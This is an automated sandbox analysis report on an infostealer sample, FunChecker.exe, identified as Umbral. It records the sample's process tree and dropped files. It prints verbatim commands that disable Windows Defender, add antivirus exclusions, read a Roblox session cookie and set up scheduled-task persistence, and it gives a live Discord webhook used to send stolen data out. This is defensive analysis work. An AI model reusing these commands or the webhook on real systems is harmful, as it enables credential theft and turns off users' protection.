Analysis

  • max time kernel
    101s
  • max time network
    105s
  • platform
    windows10-1703_x64
  • resource
    win10-20240404-en
  • resource tags

    arch:x64arch:x86image:win10-20240404-enlocale:en-usos:windows10-1703-x64system
  • submitted
    17-07-2024 18:36

General

  • Target

    FunChecker.exe

  • Size

    13.5MB

  • MD5

    04accc794822e6da6b05da11cbd723a9

  • SHA1

    1b3e53a762f991d0f2689cd34adb8c8b88e6b6e5

  • SHA256

    98ffd90c72e22b5ce1783eeeebc424702e45398a7be1f3f9343beb7c87fc7977

  • SHA512

    904a481079c978f3822ac230fd03d210f52acc91d92d8ef833c2274e1441e49c547cb563cd7125b65c1a06c62ee1ed2bc0f42643e56330eeb9a5d208eddec5fb

  • SSDEEP

    393216:lXDyJgJ/LcGR1m6PH4xS8b+lpDLluOJYBowUt8/d:lDyJ2/LX1+E84DLwOJYBowI81

Malware Config

Extracted

Family

umbral

C2

https://discord.com/api/webhooks/1263163627955818638/O6H0XtkfVMlzt1CR2LtuxnT8hf_eK3rxCg4Z8Ho7QTiBTbC3moAh35BYkmVLUE-l4NEA

Signatures

  • Detect Umbral payload 3 IoCs
  • Modifies Windows Defender Real-time Protection settings 3 TTPs 11 IoCs
  • Modifies security service 2 TTPs 1 IoCs
  • Umbral

    Umbral stealer is an opensource moduler stealer written in C#.

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 4 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 9 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Drops file in Drivers directory 1 IoCs
  • Checks BIOS information in registry 2 TTPs 8 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Drops startup file 4 IoCs
  • Executes dropped EXE 3 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Themida packer 14 IoCs

    Detects Themida, an advanced Windows software protection system.

  • Adds Run key to start application 2 TTPs 2 IoCs
  • Checks whether UAC is enabled 1 TTPs 4 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Suspicious use of NtSetInformationThreadHideFromDebugger 4 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Delays execution with timeout.exe 1 IoCs
  • Detects videocard installed 1 TTPs 1 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Modifies registry class 3 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 49 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\FunChecker.exe
    "C:\Users\Admin\AppData\Local\Temp\FunChecker.exe"
    1⤵
    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
    • Checks BIOS information in registry
    • Checks whether UAC is enabled
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of WriteProcessMemory
    PID:4900
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\avdisable.bat" "
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:4800
      • C:\Windows\SysWOW64\reg.exe
        reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
        3⤵
        • Modifies Windows Defender Real-time Protection settings
        PID:864
      • C:\Windows\SysWOW64\reg.exe
        reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
        3⤵
          PID:4560
        • C:\Windows\SysWOW64\reg.exe
          reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
          3⤵
            PID:3288
          • C:\Windows\SysWOW64\reg.exe
            reg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
            3⤵
              PID:5052
            • C:\Windows\SysWOW64\reg.exe
              reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
              3⤵
              • Modifies Windows Defender Real-time Protection settings
              PID:5088
            • C:\Windows\SysWOW64\reg.exe
              reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
              3⤵
              • Modifies Windows Defender Real-time Protection settings
              PID:5056
            • C:\Windows\SysWOW64\reg.exe
              reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
              3⤵
              • Modifies Windows Defender Real-time Protection settings
              PID:5096
            • C:\Windows\SysWOW64\reg.exe
              reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
              3⤵
              • Modifies Windows Defender Real-time Protection settings
              PID:3680
            • C:\Windows\SysWOW64\reg.exe
              reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
              3⤵
              • Modifies Windows Defender Real-time Protection settings
              PID:4936
            • C:\Windows\SysWOW64\reg.exe
              reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
              3⤵
                PID:5116
              • C:\Windows\SysWOW64\reg.exe
                reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
                3⤵
                  PID:4084
                • C:\Windows\SysWOW64\reg.exe
                  reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
                  3⤵
                    PID:2912
                  • C:\Windows\SysWOW64\reg.exe
                    reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f
                    3⤵
                      PID:2488
                    • C:\Windows\SysWOW64\reg.exe
                      reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
                      3⤵
                        PID:4204
                      • C:\Windows\SysWOW64\reg.exe
                        reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
                        3⤵
                          PID:4196
                        • C:\Windows\SysWOW64\schtasks.exe
                          schtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
                          3⤵
                            PID:4704
                          • C:\Windows\SysWOW64\schtasks.exe
                            schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
                            3⤵
                              PID:3548
                            • C:\Windows\SysWOW64\schtasks.exe
                              schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
                              3⤵
                                PID:4348
                              • C:\Windows\SysWOW64\schtasks.exe
                                schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
                                3⤵
                                  PID:3024
                                • C:\Windows\SysWOW64\schtasks.exe
                                  schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
                                  3⤵
                                    PID:4552
                                  • C:\Windows\SysWOW64\reg.exe
                                    reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "SecurityHealth" /f
                                    3⤵
                                      PID:2824
                                    • C:\Windows\SysWOW64\reg.exe
                                      reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth" /f
                                      3⤵
                                        PID:2996
                                      • C:\Windows\SysWOW64\reg.exe
                                        reg delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
                                        3⤵
                                        • Modifies registry class
                                        PID:4316
                                      • C:\Windows\SysWOW64\reg.exe
                                        reg delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
                                        3⤵
                                        • Modifies registry class
                                        PID:5016
                                      • C:\Windows\SysWOW64\reg.exe
                                        reg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
                                        3⤵
                                        • Modifies registry class
                                        PID:868
                                      • C:\Windows\SysWOW64\reg.exe
                                        reg add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
                                        3⤵
                                          PID:4548
                                        • C:\Windows\SysWOW64\reg.exe
                                          reg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
                                          3⤵
                                            PID:2784
                                          • C:\Windows\SysWOW64\reg.exe
                                            reg add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
                                            3⤵
                                              PID:1292
                                            • C:\Windows\SysWOW64\reg.exe
                                              reg add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
                                              3⤵
                                                PID:4532
                                              • C:\Windows\SysWOW64\reg.exe
                                                reg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
                                                3⤵
                                                • Modifies security service
                                                PID:4860
                                            • C:\Users\Admin\AppData\Local\Temp\svchost.exe
                                              "C:\Users\Admin\AppData\Local\Temp\svchost.exe"
                                              2⤵
                                              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                              • Drops file in Drivers directory
                                              • Checks BIOS information in registry
                                              • Executes dropped EXE
                                              • Checks whether UAC is enabled
                                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                                              • Suspicious behavior: EnumeratesProcesses
                                              • Suspicious use of AdjustPrivilegeToken
                                              PID:4528
                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\svchost.exe'
                                                3⤵
                                                • Command and Scripting Interpreter: PowerShell
                                                • Suspicious behavior: EnumeratesProcesses
                                                • Suspicious use of AdjustPrivilegeToken
                                                PID:1088
                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
                                                3⤵
                                                • Suspicious behavior: EnumeratesProcesses
                                                • Suspicious use of AdjustPrivilegeToken
                                                PID:3952
                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                                3⤵
                                                • Suspicious behavior: EnumeratesProcesses
                                                • Suspicious use of AdjustPrivilegeToken
                                                PID:872
                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                                3⤵
                                                • Suspicious behavior: EnumeratesProcesses
                                                • Suspicious use of AdjustPrivilegeToken
                                                PID:436
                                              • C:\Windows\SysWOW64\Wbem\wmic.exe
                                                "wmic.exe" os get Caption
                                                3⤵
                                                • Suspicious use of AdjustPrivilegeToken
                                                PID:1088
                                              • C:\Windows\SysWOW64\Wbem\wmic.exe
                                                "wmic.exe" computersystem get totalphysicalmemory
                                                3⤵
                                                • Suspicious use of AdjustPrivilegeToken
                                                PID:4744
                                              • C:\Windows\SysWOW64\Wbem\wmic.exe
                                                "wmic.exe" csproduct get uuid
                                                3⤵
                                                  PID:2416
                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
                                                  3⤵
                                                  • Suspicious behavior: EnumeratesProcesses
                                                  PID:212
                                                • C:\Windows\SysWOW64\Wbem\wmic.exe
                                                  "wmic" path win32_VideoController get name
                                                  3⤵
                                                  • Detects videocard installed
                                                  PID:4192
                                              • C:\Users\Admin\AppData\Local\Temp\Microsoft OneDrive.exe
                                                "C:\Users\Admin\AppData\Local\Temp\Microsoft OneDrive.exe"
                                                2⤵
                                                • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                • Checks BIOS information in registry
                                                • Drops startup file
                                                • Executes dropped EXE
                                                • Adds Run key to start application
                                                • Checks whether UAC is enabled
                                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                • Suspicious behavior: EnumeratesProcesses
                                                • Suspicious use of AdjustPrivilegeToken
                                                • Suspicious use of SetWindowsHookEx
                                                PID:4200
                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Microsoft OneDrive.exe'
                                                  3⤵
                                                  • Command and Scripting Interpreter: PowerShell
                                                  • Suspicious behavior: EnumeratesProcesses
                                                  • Suspicious use of AdjustPrivilegeToken
                                                  PID:428
                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Microsoft OneDrive.exe'
                                                  3⤵
                                                  • Command and Scripting Interpreter: PowerShell
                                                  • Suspicious behavior: EnumeratesProcesses
                                                  • Suspicious use of AdjustPrivilegeToken
                                                  PID:944
                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\FunChecker.exe'
                                                  3⤵
                                                  • Command and Scripting Interpreter: PowerShell
                                                  • Suspicious behavior: EnumeratesProcesses
                                                  PID:2324
                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'FunChecker.exe'
                                                  3⤵
                                                  • Command and Scripting Interpreter: PowerShell
                                                  • Suspicious behavior: EnumeratesProcesses
                                                  PID:3812
                                                • C:\Windows\SysWOW64\schtasks.exe
                                                  "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "FunChecker" /tr "C:\Users\Admin\AppData\Roaming\FunChecker.exe"
                                                  3⤵
                                                  • Scheduled Task/Job: Scheduled Task
                                                  PID:4296
                                                • C:\Windows\SysWOW64\schtasks.exe
                                                  "C:\Windows\System32\schtasks.exe" /delete /f /tn "FunChecker"
                                                  3⤵
                                                    PID:660
                                                  • C:\Windows\SysWOW64\cmd.exe
                                                    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp25A4.tmp.bat""
                                                    3⤵
                                                      PID:192
                                                      • C:\Windows\SysWOW64\timeout.exe
                                                        timeout 3
                                                        4⤵
                                                        • Delays execution with timeout.exe
                                                        PID:3608
                                                  • C:\Users\Admin\AppData\Local\Temp\system32.exe
                                                    "C:\Users\Admin\AppData\Local\Temp\system32.exe"
                                                    2⤵
                                                    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                    • Checks BIOS information in registry
                                                    • Drops startup file
                                                    • Executes dropped EXE
                                                    • Adds Run key to start application
                                                    • Checks whether UAC is enabled
                                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                    • Suspicious behavior: EnumeratesProcesses
                                                    • Suspicious use of AdjustPrivilegeToken
                                                    • Suspicious use of SetWindowsHookEx
                                                    PID:2988
                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\system32.exe'
                                                      3⤵
                                                      • Command and Scripting Interpreter: PowerShell
                                                      • Suspicious behavior: EnumeratesProcesses
                                                      • Suspicious use of AdjustPrivilegeToken
                                                      PID:4208
                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'system32.exe'
                                                      3⤵
                                                      • Command and Scripting Interpreter: PowerShell
                                                      • Suspicious behavior: EnumeratesProcesses
                                                      • Suspicious use of AdjustPrivilegeToken
                                                      PID:2908
                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft OneDrive'
                                                      3⤵
                                                      • Command and Scripting Interpreter: PowerShell
                                                      • Suspicious behavior: EnumeratesProcesses
                                                      PID:3996
                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Microsoft OneDrive'
                                                      3⤵
                                                      • Command and Scripting Interpreter: PowerShell
                                                      • Suspicious behavior: EnumeratesProcesses
                                                      PID:4944
                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                      "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Microsoft OneDrive" /tr "C:\Users\Admin\AppData\Roaming\Microsoft OneDrive"
                                                      3⤵
                                                      • Scheduled Task/Job: Scheduled Task
                                                      PID:2716
                                                  • C:\Windows\SysWOW64\cmd.exe
                                                    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FunChecker.bat" "
                                                    2⤵
                                                    • Suspicious use of WriteProcessMemory
                                                    PID:652
                                                    • C:\Windows\SysWOW64\chcp.com
                                                      chcp 65001
                                                      3⤵
                                                        PID:496

                                                  Network

                                                  MITRE ATT&CK Enterprise v15

                                                  Replay Monitor

                                                  Loading Replay Monitor...

                                                  Downloads

                                                  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

                                                    Filesize

                                                    2KB

                                                    MD5

                                                    1c19c16e21c97ed42d5beabc93391fc5

                                                    SHA1

                                                    8ad83f8e0b3acf8dfbbf87931e41f0d664c4df68

                                                    SHA256

                                                    1bcd97396c83babfe6c5068ba590d7a3f8b70e72955a9d1e4070648e404cbf05

                                                    SHA512

                                                    7d18776d8f649b3d29c182ff03efc6cea8b527542ee55304980f24577aae8b64e37044407776e220984346c3998ace5f8853afa58c8b38407482a728e9495e0c

                                                  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                    Filesize

                                                    18KB

                                                    MD5

                                                    c56b1bd9a1bf3b25bc74bade9af3e969

                                                    SHA1

                                                    f646520f0e2012cf68503f7a3c6a2dc968b7e92c

                                                    SHA256

                                                    f3c0972139750f69abb60fce015ef11725d227aeb1a91c981310ee4009f7def5

                                                    SHA512

                                                    36604b04814bfc8120a7a1fdc6342aab87544525e44c9cf53ac84e68ee654c724413857d5111509f0dec619e673e0b155cc8e7cc113a4c8845ca9a8fa52d0b05

                                                  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                    Filesize

                                                    18KB

                                                    MD5

                                                    9809c73926752a46c7dece5c80bdb643

                                                    SHA1

                                                    de4c52439b69e515463d110a3f75fa637115cd7c

                                                    SHA256

                                                    cacd6bcb2d96dc596e23f2873f24af4f7387214886d633c349be0a947e93f6d6

                                                    SHA512

                                                    87a3b863678ac7b0e13530aaca5197fab9d0b4200bcfb137ebcfb67857d5619512b43ca53cf6f2c9f284fe102438f9e184635081af2b5e5b23ceae296c4786ff

                                                  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                    Filesize

                                                    18KB

                                                    MD5

                                                    ab1f4f052fb814675d3bce7d14eaff3a

                                                    SHA1

                                                    1fa3a0a7a475e34ba8eca7eedfdaf8af78a95374

                                                    SHA256

                                                    d8a2ca6e3cccc1cb0cd2a9efec27b3fe6191a415707ddf7ab44399815e656050

                                                    SHA512

                                                    6cc1d8a3251677308d48cba7be658a564c6443edeaa66534ce852f0fa1e1d3751963af31b6c32a7fceaeb45d7f89611078f0758c8ec39403a2522f1241f99ae8

                                                  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                    Filesize

                                                    18KB

                                                    MD5

                                                    649d838fc64c8dc6a49ae45c20f3d258

                                                    SHA1

                                                    5431bfdf464ded876a86807e306d5c3daa457e98

                                                    SHA256

                                                    94592ed3d9cf577e882892b94399aa3b04b0174ef76f9faa3c4a62fe555afaa9

                                                    SHA512

                                                    2951681789078da616908e152021a4a7215f586e58a67a72379f9f22cc8091ae13f07f7958b572d521b9af1d6e71cf53ef5647da9342e52b2a2b4f924793cce1

                                                  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                    Filesize

                                                    18KB

                                                    MD5

                                                    3633b6611ddab582a906f1ad5d240d86

                                                    SHA1

                                                    4477610f3c1bb1f35372308d73b4d6eeaa892ec9

                                                    SHA256

                                                    9aa8c5b143f7c3a180fd4dc0599bc51d97d596f573ba1c3275be7a15040dd9ed

                                                    SHA512

                                                    114b46731df8a84030aaf3ca1c7b36812bdaf72a10b9569839efab8723baebc6f612d9f80fe441fcf4ed1bf12bab3ce07b3e26c29386457c7cf14e1384307a41

                                                  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                    Filesize

                                                    18KB

                                                    MD5

                                                    20ea3dc66b82c3204e04a735c2e742ad

                                                    SHA1

                                                    1ea7d31f1d1e4a4cc7a31a2a198f979c995fdbc0

                                                    SHA256

                                                    d4a18c6c4d08b8a63f6acaace1f64a5a5252b128284db3aaf6559086baf876da

                                                    SHA512

                                                    91c31607b94af1c4be0f48e664a96003f5e8fa05842ef3f9d83d114f567367847f4d0affdd3f86e919747fc287dd0b66bcec8edf9c0597b447ee5814983caa5c

                                                  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                    Filesize

                                                    15KB

                                                    MD5

                                                    6bfaf4d4fff7e439e4e34d04035274b7

                                                    SHA1

                                                    36e4be4257fde47c627108b17d4705535ec6340a

                                                    SHA256

                                                    16b007690c7cc59d1f65df2753bc2299c2a4d315da2576e9e3b6835a1a32f867

                                                    SHA512

                                                    18a7a6f82a659fbc481f835ba8e23fe87ec5f571c72efdfa97cdeaa6f06db2458832eb7e913787003458761741489d0aa793daa990601214fbe7f996d9667ff9

                                                  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                    Filesize

                                                    18KB

                                                    MD5

                                                    28352882fd58e4d7917c7b6795d83473

                                                    SHA1

                                                    5a1b40bf649eb7c5b368bfed34b71c355619c593

                                                    SHA256

                                                    262444c4f9bed09958e3ac582f3d46bf8215c94fc11014c3df939828722f4f1b

                                                    SHA512

                                                    00355c4e47c867fcbdfb0868612bd14e052380e414496d87b07396b37f3a424efe51377ac5e85b38ab563c5ce5021dff3646e12a2ec6a649f6f3fc6f5632160d

                                                  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                    Filesize

                                                    18KB

                                                    MD5

                                                    42257b947535cd5eb503b560693cab00

                                                    SHA1

                                                    cb5ce5b7c5ffb23f8ec1165de04d1ad67e6098dc

                                                    SHA256

                                                    f54d546c9542b820da4fc24b677997f86d5b19311a1aac56a5a4264f8e33ebe9

                                                    SHA512

                                                    25927501c12bf6af18e7d28265c49120eda261bf2f26845f5ac1988c267c7e45198566c91b1fe12814c3071b9e3d616301fc05c9a5020538206e976575661c63

                                                  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                    Filesize

                                                    18KB

                                                    MD5

                                                    0ad317ee151554ac790048134e6d1143

                                                    SHA1

                                                    3130dd19e2243467e098fd43604e1499f10f0550

                                                    SHA256

                                                    29d2481ed0251b75b2a34eaea6db22b1824808819ca8c6207440d00db763ad3d

                                                    SHA512

                                                    57f844b93ae17e690d53ff7bca85b70cf242be56c6cf98b1ff4ef191784ec64e35b66cc94dc90c86d087c916c87c862071e7f05fa6663f14dc973f61a812c9f2

                                                  • C:\Users\Admin\AppData\Local\Temp\FunChecker.bat

                                                    Filesize

                                                    3KB

                                                    MD5

                                                    42afdea7c75bc9074a22ff1be2787959

                                                    SHA1

                                                    24bc20691a1e99e2cf0b2bca78694701fa47720a

                                                    SHA256

                                                    3d005de7ab5cd8684deeb07dd7e280659384bc574ebe2293b470e29a092ecbc2

                                                    SHA512

                                                    d30c5a89fa98534dc53f0e686db7a4eae66c891a4c06f585fcb35f3dcbad372365f175d2b7fa878875812dd9da097181784a35f8f615e8c05668d64a13863bb9

                                                  • C:\Users\Admin\AppData\Local\Temp\Microsoft OneDrive.exe

                                                    Filesize

                                                    3.4MB

                                                    MD5

                                                    8496d6a30ba3fdb1cd908cbcb41ef84e

                                                    SHA1

                                                    986c94e5a502ef12b2cafab7cd21401436154e8f

                                                    SHA256

                                                    65d35c5e52deb2c59470f099dfb44b05b2121e6f550a31727d3fee8f5be067cc

                                                    SHA512

                                                    e28b7d3255f6639b6c1ef4ad6029ef64bcc6c0988e298465f9db2441aa30737b29bb6d3a0dc71f5e6f5835dd1553503e4b36b571c9ebfe28e4ea3398010f74d9

                                                  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_2d3daxiv.yat.ps1

                                                    Filesize

                                                    1B

                                                    MD5

                                                    c4ca4238a0b923820dcc509a6f75849b

                                                    SHA1

                                                    356a192b7913b04c54574d18c28d46e6395428ab

                                                    SHA256

                                                    6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b

                                                    SHA512

                                                    4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

                                                  • C:\Users\Admin\AppData\Local\Temp\avdisable.bat

                                                    Filesize

                                                    3KB

                                                    MD5

                                                    4c35b71d2d89c8e8eb773854085c56ea

                                                    SHA1

                                                    ede16731e61348432c85ef13df4beb2be8096d9b

                                                    SHA256

                                                    3efeeaaabfd33ff95934bee4d6d84e4ecb158d1e7777f6eecd26b2746991ed42

                                                    SHA512

                                                    a6ccbb2913738ca171686a2dd70e96330b0972dadb64f7294ac2b4c9bb430c872ed2bcd360f778962162b9e3be305836fa7f6762b46310c0ad4d6ef0c1cdac8d

                                                  • C:\Users\Admin\AppData\Local\Temp\svchost.exe

                                                    Filesize

                                                    3.6MB

                                                    MD5

                                                    c2f9feba8f68d6772ba7fc1536603a33

                                                    SHA1

                                                    e17c6f4fc8dcad67d0449c1f2f7d0863345d72c1

                                                    SHA256

                                                    005efd0dcf8e4b4726d5717f9a1dedf4977d1477fd92b4490a1f851c8ed5d59a

                                                    SHA512

                                                    8fa32ba1b80d94fcc28586cda1297dac4e444a0f20071bebc2644d3024551d2556f22bd549ca3f50f557a775a170df337953cc861be62f0ef248561c1615e968

                                                  • C:\Users\Admin\AppData\Local\Temp\system32.exe

                                                    Filesize

                                                    3.3MB

                                                    MD5

                                                    b68dca29d73214a87ec703b788b456fd

                                                    SHA1

                                                    52cf9419bdaea5b1e1055186e4ea024fd1ee979e

                                                    SHA256

                                                    049d8e8426b4ce065699759382d7d5d5a245f12d05bc6a0324a94426ec891d15

                                                    SHA512

                                                    ec596f32f1bdee1221281aaa12139c35ef78ed9bc679a4b4c5c44a7a1ecf460d42516ea603c5aacc5b35499399205197d45c0bc1c6cd213c95cdcc54b918196b

                                                  • C:\Users\Admin\AppData\Local\Temp\tmp25A4.tmp.bat

                                                    Filesize

                                                    170B

                                                    MD5

                                                    3880a847b166ca071c8fca61111b6ad4

                                                    SHA1

                                                    eff202011e22774a20a3dfacbaeac6780d34b0cb

                                                    SHA256

                                                    6e0780f85c7208edfe441bc6fbedb80853c705446c7b6855d38d9b67466f80e5

                                                    SHA512

                                                    234d3a50b582cc9aecf627902d394631045cf5e7d77c4212655763e239205f7322cc051b63f02babce153b8f579ae5421986106271ce3e307e5429a5bd25dc6b

                                                  • memory/428-372-0x0000000007730000-0x0000000007A80000-memory.dmp

                                                    Filesize

                                                    3.3MB

                                                  • memory/428-414-0x000000006F580000-0x000000006F5CB000-memory.dmp

                                                    Filesize

                                                    300KB

                                                  • memory/428-419-0x0000000009320000-0x00000000093C5000-memory.dmp

                                                    Filesize

                                                    660KB

                                                  • memory/872-345-0x0000000008470000-0x00000000084BB000-memory.dmp

                                                    Filesize

